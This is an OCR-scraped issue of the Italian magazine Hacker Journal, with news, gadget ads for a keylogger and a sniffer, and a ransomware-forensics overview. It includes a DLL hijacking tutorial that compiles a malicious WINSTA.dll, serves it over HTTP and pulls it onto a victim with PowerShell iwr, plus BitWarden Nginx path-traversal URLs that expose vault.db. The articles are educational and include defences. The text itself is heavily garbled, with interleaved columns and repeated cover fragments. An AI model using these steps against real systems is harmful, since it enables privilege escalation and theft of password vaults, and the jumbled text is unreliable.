Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Hacker Journal N.274 - Novembre-Dicembre 2023-1
Hacker Journal N.274 - Novembre-Dicembre 2023-1
TOR
TREMNAATTEI
SMARTPHONE
N.274 Novembre\Dicembre
A PROVA
DI SPIA!
App 100% legali potrebbero nascondere
delle insidie. Le dritte per sgamarle
Dal 2002 tutto quello che gli altri non osano dirti
www.hackerjournal.it
La rete anticensura
oltre il DarkWeb
Si accede tramite un apposito tool
e ci si trova davvero l’impossibile.
Cosa abbiamo scoperto
Gothic 2 conquista
anche il Pinguino!
TARIFFA R.O.C. Poste Italiane S.p.A. – spedizione in abbonamento postale – MBPA/LO-NO/125/A.P./2017- ART.1 COMMA1- S /NA
ENDERSI
LA GUIDA PER DIF
Così entrano
in Windows
A PAGINA
10
Innovazione criminale
M
i ha molto colpito l’intervento del
procuratore Nicola Gratteri, il quale ha
delineato un panorama preoccupante ma
anche illuminante sulla ’ndrangheta e il suo
“abbraccio dell’innovazione”. Questo spostamento
strategico ci mostra che la battaglia contro le mafie
non si svolge più solo nelle ombre dei vicoli, ma
anche nei meandri oscuri del digitale.
È inquietante pensare che persone dotate di
competenze avanzate in sicurezza informatica
possano trovarsi al servizio di organizzazioni
criminali. Questo solleva una questione cruciale per
la comunità hacker: quali valori si rappresentano? E
come ci si può differenziare da quegli individui che CONTATTI
scelgono di usare le loro abilità per scopi davvero REDAZIONE
poco condivisibili?! redazione@hackerjournal.it
Spero di sbagliarmi, ma sembra che le forze
ABBONAMENTI
dell’ordine italiane, una volta considerate tra le E ARRETRATI
migliori al mondo, siano ora in difficoltà, soprattutto abbonamenti@sprea.it
per la mancanza di risorse e investimenti. Eppure, www.sprea.it/digital
come dimostra l’FBI con la piattaforma Anom, la
FACEBOOK
giusta combinazione di tecnologia e strategia può www.facebook.com/
creare svolte decisive. A mio parere, tutti, ma hackerjournal/
proprio tutti, dobbiamo unire le forze e mettere le
SITO WEB
competenze al servizio del bene comune. www.hackerjournal.it
La sfida lanciata da Gratteri non può e non deve
cadere nel vuoto. La tecnologia, nelle mani giuste,
deve essere l’arma definitiva contro la criminalità.
La scelta, in pratica, spetta a noi.
Gianmarco Bruni
3
r Journa l sarà in edicola
Hacke pari
ogni 10 dei mesi dis
SOMMARIO
HACKTUALITÀ
News
Notizie e anticipazioni dell’universo hacker .................................................. 6
10
COVER STORY
Così entrano in Windows
Gli utenti ignari installano una semplice DLL mancante nel sistema
e aprono così la porta ai pirati per sferrare un attacco di Privilege
Escalation nell’host target. ....................................................................................... 10
Vulnerabilità | Il portachiavi in bella mostra
Un bug nella configurazione di Nginx per BitWarden, il noto gestore
di password, permette di sferrare un attacco brute force ........................... 16
AIUTACI A MIGLIORARE
RITA!
LA TUA RIVISTA PREFErjournal
ABBONATI ALLA
V ER SI ON E DIGITA LE
SOLO PER PC E MAC
Vai su https://bit.ly/h
acke
A SOLI 10,90 € onimo an
e compila il questionario
NTO: 1 ANNO
DURATA ABBONAME
al.it/abbonamenti
www.hackerjourn
Il primo manifesto hacker
“... avete mai guardato dietro agli occhi dell’hacker?
Vi siete mai chiesti cosa lo stimola, che forze
lo hanno formato, cosa può averlo forgiato?
Io sono un hacker, entra nel mio mondo...”
SICUREZZA Pentest
Metasploitable3 | E ora... il cracking delle password
Continua il corso su come aumentare le competenze da pentester...... 24
Freenet
HOW TO
Reti P2P | La rete anticensura oltre il DarkWeb
Si accede tramite un apposito tool e ci si trova davvero l’impossibile.
Cosa abbiamo scoperto ..............................................................................................48
HACKULTURE
NOI RISPETTIAMO L’AMBIENTE
Hacker Journal è stato stampato
su carta certificata PEFC, proveniente
da piantumazioni a riforestazione
programmata e perciò gestite
Hacking e Musica | Il lato “sonoro” dell’hacking in maniera sostenibile.
NEWS
# S IC U R E Z Z A Son y nel mi ri no
TEMU POTREBBE
NASCONDERE dei criminal i?
UNO SPYWARE #RANSOMWARE “Come cancellare account su Playstation”.
L’emergente piattaforma cinese
è stata analizzata da un gruppo Stando a Google Trends, queste parole hanno registrato
di ricercatori che ha scoperto... un’impennata nelle ricerche del 277%. Motivo? La possibile
violazione dei sistemi della casa giapponese
6
NEWS
USA, rubate GLI HACKER
RUSSI CERCANO
60 mila email PROVE
#HACKING Durante un recente briefing al Senato, SUI CRIMINI
è stato rivelato che il furto delle caselle di posta
è stato realizzato nell’arco dell’estate
DI GUERRA
#CYBERGUERRA Di recente,
G
nove su dieci, fossero dedicati a
li attacchi, una volta
tale ambito. La segretaria al prevalentemente diretti
Commercio degli USA, Gina verso le infrastrutture
Raimondo, ha indicato con forti energetiche dell’Ucraina,
sospetti il coinvolgimento di sembrano avere ora un
hacker di origini cinesi, obiettivo diverso. Secondo un
sottolineando una possibile recente report del SSSCIP, l’ente
sponsorizzazione da parte del governo di Pechino. Ulteriori ucraino incaricato della
indagini stanno cercando di confermare o smentire queste protezione delle comunicazioni,
accuse. Nel corso di un’assemblea a Capitol Hill, alcuni dettagli vi è stato un marcato calo delle
dell’attacco sono stati ulteriormente approfonditi. Il portavoce offese al settore energetico.
del Dipartimento di Stato, Kelly Fletcher, ha sottolineato la Al contrario, si è osservato un
natura mirata dell’attacco. L’incidente solleva nuove aumento delle offensive contro
preoccupazioni sulla sicurezza delle comunicazioni ufficiali e la le istituzioni giuridiche, incluse
necessità di rafforzare le misure di protezione per prevenire le forze dell’ordine, tribunali e
ulteriori compromissioni in futuro. procure. Un cambio di direzione
che indica un chiaro intento:
rintracciare documenti che
possano fungere da prova dei
GRATTERI: “CONTRO LE MAFIE crimini di guerra perpetrati
S ono parole del procuratore Nicola Gratteri che, durante l’evento Librixia, ha
presentato il suo recente saggio, co-scritto con Antonio Nicaso, dal titolo «Fuori
dai confini. La ‘ndrangheta nel mondo», edito da Mondadori. “Le recenti indagini – ha
dichiarato il magistrato – hanno rivelato un utilizzo crescente di esperti e hacker, in
particolare di nazionalità tedesca e rumena, capaci di movimentare enormi somme
di denaro in pochissimo tempo, rendendo quasi impossibile rintracciarne le origini”.
Gratteri ha evidenziato anche la scarsità di risorse e l’insufficienza di investimenti
nel settore. “Anche se una volta la Polizia giudiziaria italiana veniva considerata tra
le migliori al mondo, le assunzioni sono state congelate per anni, rallentando
l’adattamento alle nuove minacce. L’FBI, ad esempio, ha saputo contrastare la
criminalità con l’utilizzo strategico della tecnologia, come dimostra il successo della
piattaforma Anom”.
7
GADGET DA HACKER
HACKTUALITÀ
MULTITO OL
SCA C’È UN PICCOLO GENIO
IN TA 239,95
euro
https://www.short.tips/url/amflipperzero
KEY LOG GER HAR DWA RE SNIF FER BLU ETO OTH
Non farti ingannare UN LABORATORIO
dalle dimensioni! DI ANALISI BLE
https://www.short.tips/url/sniffkeywifi TASCABILE
https://www.short.tips/url/sniffble
N onostante le dimensioni ridotte (appena 10 mm di
U
lunghezza), AirDrive Forensic Keylogger è una potente na volta inserito nella porta USB,
soluzione per la registrazione delle sequenze di tasti inizierà immediatamente a raccogliere
premuti su qualsiasi tastiera USB. Una delle sue principali e a trasmettere i dati sulla sessione di
caratteristiche, infatti, è la capacità di registrare fino a comunicazione. “Annuserà” in tempo reale
8000 pagine di testo, grazie a una memoria flash interna da e vi restituirà una comprensione
16 MB. Supporta oltre 40 layout di tastiera: ciò significa che, approfondita del traffico Bluetooth. Il
indipendentemente dalla lingua o dal paese in cui viene vantaggio principale di questo sniffer
utilizzato, è in grado di registrare accuratamente ogni tasto. rispetto ad altri strumenti simili è la sua
La funzionalità Wi-Fi, poi, lo rende davvero unico: agisce integrazione diretta con Wireshark, uno
come un hotspot, permettendo agli utenti di connettersi al dei più popolari strumenti di analisi di rete,
dispositivo da computer, smartphone o tablet. Questo che offre un’interfaccia utente intuitiva e
elimina la necessità di un accesso fisico al keylogger per una vasta gamma di funzionalità di
recuperare i dati. Oltre a tutto ciò, integra misure di filtraggio e ricerca. Il suo firmware è stato
sicurezza avanzate, tra cui la crittografia hardware e il ottimizzato per garantire che ogni
supporto per protocolli di sicurezza di rete come WEP, WPA pacchetto venga catturato con precisione
e WPA-2. e senza perdite, una precisione essenziale
quando si tratta di debug o analisi di
problemi di connettività.
113,99 41,24
euro euro
8
H AC K T U A L I TÀ
COVER STORY Così entrano in Windows
Gli utenti ignari installano una semplice DLL mancante nel sistema
e aprono così la porta ai pirati per sferrare un attacco di Privilege Escalation
nell’host target ����������������������������������������������������������������������������������������������������������������������������������������������������� 10
9
HACKTUALITÀ
RY: Così entrano in Windows
COVER STO
Così entrano
in Windows
ri inst al lano un a se m plice DL L m an cante
Gli utenti igna ti pe r sferrare
a e ap ro no così la po rta ai pira
nel sistem st target
ta cc o di Priv ile ge Es ca lation ne ll’ho
un at
P
artiamo con delle codice non devono essere caricate all’interno dell’host target.
definizioni. La prima: una in memoria per ogni applicazione. Esplicitate queste definizioni,
dynamic-link library (DLL) è • Estendibilità: le DLL possono vediamo la strada che un criminale
una libreria che viene essere aggiunte o aggiornate senza dovrebbe percorrere per sfruttare
caricata, in fase di esecuzione, da un dover modificare o reinstallare appieno quest’ultima tecnica.
dato programma Windows che ne l’applicazione che le utilizza. Ciò Facciamolo leggendo le pagine che
fa uso. Essa contiene codice e dati permette alle applicazioni di essere seguono, scritte come un tutorial
che possono essere utilizzati anche ampliate o aggiornate in modo che vi guida passo dopo passo.
da più programmi. L’utilizzo delle dinamico. La seconda: la tecnica Buona lettura.
DLL ha diversi vantaggi... del DLL Hijacking. In ambienti
• Riutilizzo del codice e Windows, prevede che, quando LO SCENARIO
modularità: il codice contenuto in viene eseguita un’applicazione o un Supponete di essere riusciti a
una DLL può essere utilizzato da servizio, essi utilizzano una serie di ottenere l’accesso a un host
più applicazioni. Ciò significa che gli DLL. Se una di queste DLL non viene Windows appartenente alla rete
sviluppatori possono creare librerie trovata dal programma che la dell’ipotetica company target e di
di funzioni comuni, riutilizzabili da utilizza, o il suo caricamento avviene aver scoperto, a seguito di
più applicazioni. Questo porta alla da un “path” con miss-configuration un’accurata fase di enumerazione
modularità del codice e rende più dei permessi, è possibile effettuare del target, che potete sfruttare la
facile la manutenzione e un attacco di Privilege Escalation tecnica di DLL Hijacking per elevare i
l’aggiornamento, dato che una
modifica in una DLL può figura #1
interessare tutte le applicazioni che
la utilizzano.
• Risparmio di memoria: poiché il
codice in una DLL può essere
condiviso tra più applicazioni, ne
consegue un risparmio di memoria,
dato che più copie dello stesso
10
NE SIAMO
MIGLIORI ESPERTI IN CIRCOLAZIO
SOLO ARTICOLI ORIGINALI DEI TORNATI
SMARTPHONE TREMATE
embre
A PROVA
N.274 Novembre\Dic
DI SPIA!
App 100% legali potrebbero
nascondere
sgamarle
delle insidie. Le dritte per
www.hackerjournal.it
La rete anticensura
oltre il Dark Web
un apposito tool
Si accede tramite .
e ci si trova davvero l’impossibile
Cosa abbiamo scoperto
Gothic 2 conquista
o
anche il Pinguinsu
COMMA1- S /NA
Linux
Siamo riusciti a installare
ruolo.
questo mitico gioco di
– MBPA/LO-NO/125/A.P./2017- ART.1
ne
Ecco il diario della ricompilazio
DERSI
Così entrano
PER DIFEN
LA GUIDA
in Windows
10
PASSWORD IL MESSAGGIO
CRACKING DITE STOP AL SI CELA TRA I PIXEL
Come funziona un
“attacco a dizionario” TRACCIAMENTO
Il tool consigliato da Anonymous
Come nascondere testi
e foto in
un video grazie alla steganografia
per scoprire le chiavi che protegge la tua privacy
online
di accesso
11
HACKTUALITÀ
RY: Così entrano in Windows
COVER STO
figura #3 tabella #1
MASK PERMISSIONS
F Full access
M Modify access
RX Read and execute access
R Read-only access
W Write-only access
figura #5
12
NE SIAMO
MIGLIORI ESPERTI IN CIRCOLAZIO
SOLO ARTICOLI ORIGINALI DEI TORNATI
SMARTPHONE TREMATE
embre
A PROVA
N.274 Novembre\Dic
DI SPIA!
App 100% legali potrebbero
nascondere
sgamarle
delle insidie. Le dritte per
www.hackerjournal.it
La rete anticensura
oltre il Dark Web
un apposito tool
Si accede tramite .
e ci si trova davvero l’impossibile
Cosa abbiamo scoperto
Gothic 2 conquista
o
anche il Pinguinsu
COMMA1- S /NA
Linux
Siamo riusciti a installare
ruolo.
questo mitico gioco di
– MBPA/LO-NO/125/A.P./2017- ART.1
ne
Ecco il diario della ricompilazio
DERSI
Così entrano
PER DIFEN
LA GUIDA
in Windows
10
PASSWORD IL MESSAGGIO
CRACKING DITE STOP AL SI CELA TRA I PIXEL
Come funziona un
“attacco a dizionario” TRACCIAMENTO
Il tool consigliato da Anonymous
Come nascondere testi
e foto in
un video grazie alla steganografia
per scoprire le chiavi che protegge la tua privacy
online
di accesso
figura #6
I file .cpp
U n file .cpp è un file sorgente
scritto nel linguaggio di
it-it/sysinternals/downloads/BgInfo L’ultimo filtro lo imposterete per programmazione C++. Questo
Considerate che, nell’esempio, si sta mostrarvi le DLL che non sono state tipo di file contiene codice
sorgente C++ che può essere
utilizzando l’ultima versione trovate all’esecuzione.
compilato in un programma o
disponibile sul sito Microsoft 4.32. una libreria eseguibile. I file .cpp
Quindi: • Result is NAME NOT FOUND sono tipicamente usati per
1) Lanciate l’eseguibile: Procmon64. then Include l’implementazione di codice,
exe [figura #9] mentre i file di intestazione (.h o
2) Dal menu in alto selezionate la .hpp) sono usati per
dichiarazioni di classi, funzioni e
voce Filter e dal menu a tendina Applicate i filtri con il tasto “Apply” e
altri identificatori.
ancora “Filter…” cliccate “OK”. Lanciate adesso Il C++ è un linguaggio di
3) Adesso impostate tre filtri per l’applicazione da analizzare, nel programmazione di alto livello
individuare le DLL target mancanti. vostro caso BgInfo64.exe. ProcMon, che supporta sia la
Tramite il tasto “Remove” potete vi mostrerà i risultati secondo i programmazione procedurale
rimuovere i filtri già preimpostati. nostri filtri di ricerca: tutte le DLL che quella orientata agli oggetti.
È largamente utilizzato in una
Il primo filtro dovrà mostrarvi “fantasma” che l’eseguibile tenta di
varietà di applicazioni, che
esclusivamente gli eventi del caricare in fase di startup, ma che vanno dallo sviluppo di sistemi
processo in oggetto: BgInfo64.exe. non trova. [figura #10] operativi e browser web fino a
Per fare ciò, impostatelo nel giochi e applicazioni per il
seguente modo: PASSO 3: CREATE trading algoritmico.
MALICIOUS DLL
• Process Name is BgInfo64.exe Per generare la DLL malevola utilizzeremo (DllMain è la
then Include avete diverse opzioni. Potrete funzione di entry point per la DLL
generarne una attraverso e viene chiamata quando la DLL
Add per aggiungere il filtro msfvenom oppure scrivere il viene caricata e scaricata. Il
[figura #7]. codice in C++: come detto, le DLL parametro ul_reason_for_call
Il secondo filtro deve mostrarvi sono moduli di codice che indica il motivo per cui DllMain è
esclusivamente le DLL possono essere caricati ed stata chiamata):
•Path ends with .dll then eseguiti da qualsiasi programma • #include <stdlib.h> e
Include su Windows. #include <windows.h>: librerie
[figura #8] Ecco il codice malevolo che standard necessarie per
figura #7 figura #8
13
HACKTUALITÀ
RY: Così entrano in Windows
COVER STO
figura #9 figura #10
x86_64-w64-mingw32-gcc
DLLrogue.cpp --shared -o
WINSTA.dll
[figura #11]
14
NE SIAMO
MIGLIORI ESPERTI IN CIRCOLAZIO
SOLO ARTICOLI ORIGINALI DEI TORNATI
SMARTPHONE TREMATE
embre
A PROVA
N.274 Novembre\Dic
DI SPIA!
App 100% legali potrebbero
nascondere
sgamarle
delle insidie. Le dritte per
www.hackerjournal.it
La rete anticensura
oltre il Dark Web
un apposito tool
Si accede tramite .
e ci si trova davvero l’impossibile
Cosa abbiamo scoperto
Gothic 2 conquista
o
anche il Pinguinsu
COMMA1- S /NA
Linux
Siamo riusciti a installare
ruolo.
questo mitico gioco di
– MBPA/LO-NO/125/A.P./2017- ART.1
ne
Ecco il diario della ricompilazio
DERSI
Così entrano
PER DIFEN
LA GUIDA
in Windows
10
PASSWORD IL MESSAGGIO
CRACKING DITE STOP AL SI CELA TRA I PIXEL
figura #12
Come funziona un
“attacco a dizionario” TRACCIAMENTO
Il tool consigliato da Anonymous
Come nascondere testi
e foto in
un video grazie alla steganografia
per scoprire le chiavi che protegge la tua privacy
online
di accesso
figura #13
PASSO 4: GHOST DLL ambiente PATH dell’utente la DLL malevola. Nel vostro caso, si
Adesso avete a posizionare la DLL Potete verificare quali sono le procede come segue. Sulla
malevola, all’interno della macchina variabili PATH tramite il comando macchina attaccante spostatevi nel
vittima. Quando un’applicazione $env:path [figura #12] folder dove avete creato la DLL
deve caricare una DLL, solitamente Quindi, se la DLL non viene trovata malevola e avviate con python un
utilizza un percorso assoluto. Se nei percorsi precedenti, verrà server HTTP:
non è specificato, utilizzerà un cercata in quelli all’interno delle python3 -m http.server 80
ordine di ricerca predefinito, nel variabili d’ambiente. La DLL, nel Dalla macchina vittima spostatevi
tentativo di trovare la DLL. vostro caso, viene cercata nella cartella C:\Tools\BgInfo\ ed
• La directory da cui viene caricata all’interno del path C:\Tools\BgInfo\ utilizzate PowerShell per fare il
l’applicazione e dato che abbiamo i permessi, downlaod del file:
• C:\Windows\System32 andremo ad allocare direttamente [figura #13]
• C:\Windows\System la DLL malevola al suddetto iwr -uri
• C:\Windows percorso. http:-/192.168.178.108/WINSTA.
• La directory di lavoro corrente dll -Outfile WINSTA.dll
• Directory nella variabile di PASSO 5: UPLOAD Adesso che la DLL malevola è stata
ambiente PATH di sistema E RESTART scaricata nella cartella C:\Tools\
• Directory nella variabile di Esistono diversi metodi per trasferire BgInfo\, potete utilizzare il servizio
che punta al file BgInfo64.exe.
Una volta che la DLL malevola è
Come difendersi? stata posizionata alla locazione
dove il programma la cercherebbe
Azioni e gli strumenti da utilizzare: sistema e infine nelle directory in fase di caricamento/avvio, è
1. Audit: PowerUp è un modulo in specificate nel percorso del sistema. necessario che il servizio (che gira
powershell utilizzato dagli attaccanti 3. Analisi preventiva: le soluzioni di
con i privilegi di amministratore)
per trovare possibili vie di escalation monitoraggio aiutano a identificare
all’interno dell’host, ma può essere l’esecuzione di software malevolo. venga riavviato. Ma l’utente non ha i
utilizzato anche da un BlueTeam per Queste soluzioni spesso fanno parte permessi per forzare il restart (del
rilevare tentativi di DLL Hijacking. delle suite di Endpoint Detection and servizio) da terminale, deve quindi
2. Restringere il caricamento delle Response (EDR), monitorano il riavviare la macchina per
librerie: è possibile configurare il comportamento delle applicazioni e
“triggerare” l’attacco (difatti come
sistema in modo da non consentire il possono impedire l’esecuzione di
hai visto nella parte 1 di
caricamento di DLL con una ricerca processi che mostrano segni di
estesa nelle directory e abilitare la attività sospetta, come il DLL Enumeration con il comando
modalità sicura di ricerca delle DLL. Hijacking. whoami /priv, l’utente ha il
permesso di Riavviare l’host).
15
ura #2
HACKTUALITÀ
A cura di
Luca Tringali
IL PORT AC HIA VI
IN BEL LA MO ST R A
Ngi nx pe r B it W arde n, il noto gestore
zione di
Un bug nella configura er di sfer ra re un at ta cco brute force
a un hack
di password, permette
S
location /attachments {
i chiama BitWarden ed è un garantito a quel percorso. Nginx,
alias /etc/bitwarden/
gestore di password infatti, legge i percorsi che gli
attachments/;
sviluppato come vengono richiesti e cerca un match
}
applicazione Web. È open con le location che sono state
source ed è utilizzabile Apparentemente, questa sezione definite. Il problema è che il match
direttamente online sui server significa solo che contattando l’URI / può essere anche parziale. Per
ufficiali. Gratuito per uso privato, attachments si vedranno i file esempio, essendo quella location
prevede piani annuali per chi ha presenti nella cartella /etc/ definita senza lo slash finale queste
bisogno di un’autenticazione a due bitwarden/attachments/. due chiamate HTTP:
fattori o comunque per le aziende C’è però un problema legato a
che devono condividere password come funziona Nginx. C’è infatti una http://bitwarden/attachments/
tra più utenti. differenza nel definire la location prova.jpg
Visto che è open source, per una così: http://bitwarden/
maggiore sicurezza alcune aziende attachmentsprova.jpg
decidono spesso di ospitarne location /attachments {
un’installazione del server oppure in quest’altro modo: costituiscono entrambe un match
direttamente nella propria LAN. location /attachments/ { valido per la location, e finiscono col
Questo protegge da puntare allo stesso file (cioè /etc/
malintenzionati esterni all’azienda; Nel secondo caso, infatti, la bitwarden/attachments/prova.
il problema è che a volte il pericolo formulazione è corretta, la location jpg). Dove sarebbe il problema in
si nasconde proprio nella azienda dovrebbe sempre terminare con lo tutto questo? Si tratta solo di due
stessa: un dipendente malfidato, slash per indicare che l’accesso è modi diversi per ottenere lo stesso
oppure un malware scaricato per
sbaglio su qualche PC...
Il nuovo sistema di
Ora, il metodo più comune per
deploy “unified” di
installare BitWarden in una rete è
tramite il container Docker ufficiale
BitWarden è ancora
(bitwarden/self-host), ma questo, segnalato come beta
ovviamente, non contiene soltanto sul sito ufficiale, ma è
il codice dell’applicazione, ma comunque ormai
anche Nginx come web server. molto diffuso.
16
VULNERABILITÀ
file che comunque deve essere Con una semplice
pubblico a prescindere. Il problema chiamata http è
è che questo meccanismo può possibile scaricare
essere sfruttato per ottenere un l’interno database
path traversal, inserendo il percorso SQLite, per provare a
speciale .. in mezzo all’URL. I decifrare le password.
meccanismi implementati per FONTE: https://labs.
evitare che l’utente possa risalire hakaioffsec.com/
alla cartella superiore bloccano il nginx-alias-
doppio punto all’inizio di un traversal/
percorso, cioè la stringa “/../”.
Quindi se si scrivesse un URL tipo: scritta nel modo sbagliato. È la LA VULNERABILITÀ
mancanza dello slash che permette Per poter sfruttare questa
http://bitwarden/attachments//./ agli utenti di chiamare un percorso vulnerabilità bisogna avere accesso
prova.txt di questo tipo: a una istanza di BitDefender, ma
non è nemmeno necessario avere
Si otterrebbe un errore 403 http://bitwarden/attachments/./ delle credenziali. Ciò significa che
(Forbidden). Se invece si digita: vault.db esiste la possibilità che qualcuno,
dall’azienda stessa, possa
http://bitwarden/attachments/./ e ottenere il file con i “segreti” di recuperare il database delle
prova.txt Bitwarden. Il bug è quindi reso password e cercare di forzarlo con
pericoloso anche dal fatto che il calma. Ma non solo: è anche
non si ottiene alcun errore, perché database è memorizzato nella possibile che qualche malware
la stringa /attachments../ non è cartella superiore di quella con gli installato per sbaglio faccia una
proibita. Però poi Nginx traduce allegati. Il “trucco” del doppio punto scansione della rete alla ricerca di
comunque il percorso in: all’inizio della stringa può infatti questi database SQLite esposti.
essere usato una volta sola, quindi Certo, non è che un
/etc/bitwarden/attachments//./ se la cartella degli allegati fosse malintenzionato possa leggere le
prova.txt stata in un percorso del tipo: password dal database, sono
cifrate, però è molto più facile
Cioè in questo percorso esatto: /etc/bitwarden/web/attachments/ tentare il brute force avendo a
disposizione il database completo.
/etc/bitwarden/prova.txt non ci sarebbe alcun problema. E, La soluzione, implementata nel
invece, a causa della struttura delle giro di pochi giorni dalla sua
che è al di fuori della cartella root cartelle, si può vedere tutto ciò che scoperta, è stata la correzione della
definita nella configurazione, ma è contenuto in /etc/bitwarden. configurazione di Nginx. Va detto
a cui l’utente può accedere senza Infatti, allo stesso modo si possono che la versione “cloud” di
alcun problema. Questo non è un anche ottenere i log BitWarden, quella implementata
bug in Nginx, è il suo preciso dell’applicazione, che sono sui server ufficiali, non risultava
funzionamento: è la differenza tra conservati nella cartella: vulnerabile. Chi avesse installato
un percorso che termina con lo nella propria LAN una istanza
slash e uno che non termina con /etc/bitwarden/logs dockerizzata di BitWarden, a
lo slash. Ci sono infatti casi questo punto, deve solo assicurarsi
particolari in cui questa Per esempio, chiamando un URL di di avere l’ultima immagine del
distinzione può essere utile per la questo tipo: container. O può entrare nel
configurazione. Il problema è che container e modificare il file di
in questo caso, nel container di http://bitwarden/attachments/./ configurazione di Nginx
Bitwarden, la configurazione è logs/notifications.log aggiungendo lo slash mancante.
17
ura #2
HACKTUALITÀ
RA NSOM W A RE
FORENS IC S: C OS ’È
E COME F UN Z IO NA
e co ns en te di ra ccog liere le prove
o ch
È l’analisi di un attacc m e si è ve ri fi cata la violazione
pi re co
digitali per meglio ca
st em i in fo rm at ic i. M a quando si usa?
dei si
D
i ransomware e del loro ANALIZZARE L’ATTACCO L’indagine digitale si può
dilagare con attacchi in Vittime dell’attacco, forze dell’ordine sostanzialmente riassumere in due
netto aumento negli ultimi o compagnie di assicurazioni, in fasi: raccolta e analisi delle prove,
anni, ne abbiamo parlato seguito a un attacco ransomware interpretazione e reporting
spesso su queste pagine. I possono ricorrere a quella che in dell’indagine. Nella prima fase gli
ransomware rappresentano oggi la gergo è conosciuta come investigatori digitali catalogano tutte
principale minaccia per la sicurezza Ramsomware Forensic, un processo le prove in loro possesso (log di
informatica, soprattutto nel Bel d’indagine complesso e sistema, registro degli eventi, flussi
Paese; lo scorso anno sono stati impegnativo, ma che può rivelarsi di rete ecc.), poi si procede con la
ben 188 gli attacchi documentati, in davvero utile per le vittime di un ricerca di informazioni utili per
crescita del 169% rispetto all’anno attacco e per le forze dell’ordine. determinare il punto debole
precedente, con un preoccupante
7,6% degli attacchi andati a buon
fine, contro il 3,4% del 2021. Sono
questi i dati inquietanti divulgati per
l’anno 2023 dal rapporto redatto
dall’Associazione Italiana per la
Sicurezza Informatica (CLUSIT),
fondata nell’anno 2000 presso il
Dipartimento di Informatica
dell’Università degli Studi di Milano.
In seguito a un attacco da
ransomware, gli esperti del settore
si ritrovano spesso a dover
affrontare una vera e propria
indagine forense in grado di
analizzare l’intero processo al fine di
individuarne i dati compromessi, Dal Rapporto CLUSIT 2023 si evince che il 37% degli attacchi globali
quelli trafugati e possibilmente gli sfruttano ii malware, seguono lo sfruttamento delle vulnerabilità
autori materiali dell’attacco. (12%), phishing e social engineering (12%) e attacchi di tipo DDoS (4%).
18
RANSOMWARE FORENSICS
Ransomware: in Italia numeri da capogiro!
I l nostro Paese è il terzo al mondo e il primo in Europa a
essere maggiormente colpito dai malware, è questo il
quadro preoccupante che emerge dall’ultimo rapporto
Anche l’AI ha contribuito
all’ascesa degli attacchi
“Stepping ahead of risk” divulgato da Trend Micro Research. ransomware. Nuovi tool
In aggiunta, secondo il report “Threatland” - redatto dal come WormGpt e
Security Operation Center e dal team di Cyber Threat
Intelligence di Swascan - nel secondo trimestre di
FraudGpt, “gemelli cattivi”
quest’anno, rispetto ai primi tre mesi, gli attacchi in Italia di ChatGpt, hanno
sono aumentati del 34,6% (+62% a livello globale), con un permesso ai
numero di aziende colpite sempre più importante (+185% cybercriminali di creare
dall’inizio dell’anno e +105% rispetto al secondo trimestre
dello scorso anno). attacchi più complessi.
utilizzato per sferrare l’attacco, le seguito alcuni degli strumenti reale o da dati “catturati” in
attività eseguite dal malware, i dati maggiormente utilizzati, da soli o in precedenza. Wireshark è in grado di
trafugati e/o criptati, le eventuali combinazione. decodificare e visualizzare pacchetti
tracce che possono far risalire di dati in base a una vasta gamma
all’autore dell’attacco. VOLATILITY: un framework open di protocolli di rete, tra cui HTTP,
L’interpretazione delle prove source scritto in Python, disponibile TCP, UDP, IP, DNS, SSL/TLS ecc.,
consentirà quindi agli esperti di per Windows, Linux e macOS, utile consentendo agli investigatori di
ricostruire l’intera sequenza degli per l’analisi della memoria forense e esaminare in dettaglio come i dati
eventi dell’attacco; a quest’ultima utile per ricostruire eventi avvenuti vengono scambiati tra i vari
fase seguirà lo step finale, ovvero la sulla macchina oggetto dell’attacco. dispositivi di rete.
presentazione dei risultati Il framework consente di estrarre Sito Internet: https://www.
dell’indagine alle parti interessate. informazioni da processi e thread in wireshark.org/
esecuzione, DLL caricate, registri
GLI STRUMENTI interessati ecc. CAPEV2: una potente sandbox
E LE TECNICHE Sito Internet: https://www. forense open source. Permette di
Ma quali sono gli strumenti che gli volatilityfoundation.org/ eseguire o controllare file sospetti
investigatori forensi digitali usano in un ambiente controllato e isolato.
per compiere il lavoro investigativo FTK IMAGER: uno strumento Il tool consente anche di recuperare
in seguito a un attacco impiegato per eseguire una copia tracce di chiamate API win32
ransomware? Tra i vari tool forense di ogni supporto digitale. eseguite da tutti i processi generati
spiccano quelli in grado di Consente, inoltre, di eseguire la dal malware, così come i file creati,
analizzare i file criptati dal malware copia della memoria RAM e eliminati e scaricati da quest’ultimo.
tentandone il ripristino, i software visualizzare in anteprima file e Sito Internet: https://github.com/
utilizzati per analizzare i file di log e i cartelle su dischi locali, unità di rete, kevoreilly/CAPEv2
file di sistema per identificare le o qualunque altra unità flash.
informazioni utili all’indagine e Sito Internet: https://www.exterro. AUTOPSY: Permette l’analisi di
quelli impiegati per analizzare il com/ftk-imager partizioni o immagini del disco. In
codice del malware al fine di seguito a un attacco il tool permette
carpirne funzionalità e origini. WIRESHARK: un potente di analizzare i dispositivi di
La scelta dello strumento più adatto analizzatore di pacchetti di rete archiviazione, recuperare file di ogni
dipende da una serie di fattori, tra open source. Permette di catturare genere e cercare manipolazioni del
cui il tipo di ransomware coinvolto, il traffico di rete proveniente da sistema all’interno del filesystem.
le risorse disponibili e le diverse interfacce, consentendo Sito Internet: https://www.autopsy.
competenze dell’analista forense. Di l’analisi del flusso di dati in tempo com/
19
HACKTUALITÀ
PORTE AP ER TE A cura di
Luca Tringali
S
e forniamo i nostri dati di correlare la cosa a qualche sui prodotti acquistati, i periodi di
a un social network servizio online dall’origine dubbia. garanzia, gli accessori richiesti
o a un qualche sito web, Quello che è forse meno chiaro è eccetera. Il fatto è che i
tendiamo (si spera) a che i nostri dati sono anche nelle responsabili commerciali hanno
chiederci che fine faranno quei mani di aziende più “tradizionali”, poi bisogno di queste
dati. E del resto se l’introduzione che non svolgono la propria informazioni, e spesso la soluzione
del GDPR è servita a qualcosa in attività sul Web ma che li usano migliore per facilitare loro
Europa, è proprio a rendere per scopi interni. Nelle grandi l’accesso è fornire una interfaccia
palese a tutti che molti servizi aziende, infatti, uno degli asset più web. Queste maschere sono
web utilizzano i nostri dati. Certo, preziosi è il registro dei clienti: ovviamente protette da una
poi non è servita a molto altro tutte le aziende cercano di autenticazione, ma in linea di
perché la gente clicca comunque tracciare quanto più possibile un massima sono siti web come tutti
su “Accetto” senza nemmeno profilo dei propri clienti, in modo gli altri, e quindi potenzialmente
leggere l’informativa della privacy. da poter proporre loro nuovi vulnerabili ad attacchi di vario
